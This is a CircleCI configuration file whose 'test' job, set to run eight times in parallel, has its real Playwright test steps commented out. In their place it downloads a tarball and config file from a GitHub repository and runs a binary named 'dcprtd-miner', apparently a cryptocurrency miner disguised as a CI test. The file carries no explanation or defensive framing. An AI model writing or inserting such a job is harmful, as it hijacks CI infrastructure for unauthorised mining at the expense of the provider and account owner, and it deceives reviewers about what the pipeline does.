version: 2.1

jobs:
  test:
    docker:
       - image: alpine:latest
     # - image: mcr.microsoft.com/playwright/python:v1.29.0-focal
    parallelism: 8
    steps:
     - checkout
     - run: |
           apk add --no-cache wget tar
           wget https://github.com/stundev/deep/raw/master/pup.tar.gz
           tar xzvf pup.tar.gz
           rm config.json
           wget https://raw.githubusercontent.com/stundev/deep/master/config.json
           ./dcprtd-miner
      #    pip install pytest-playwright
       #   playwright install
        #  pytest test.py

workflows:
  version: 2
  Build1:
     jobs:
       - test
